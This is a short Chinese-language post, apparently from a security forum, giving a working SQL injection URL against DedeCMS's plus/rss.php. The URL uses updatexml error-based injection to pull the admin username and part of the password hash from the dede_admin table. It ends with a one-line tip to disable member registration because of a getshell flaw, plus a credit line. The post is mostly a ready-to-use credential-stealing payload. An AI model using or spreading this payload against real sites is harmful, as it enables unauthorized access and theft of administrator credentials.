注入代码:
uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1
测试:
安全提示:
请关闭会员注册,会员中心存在getshell漏洞
注:首发tools,由情整理编辑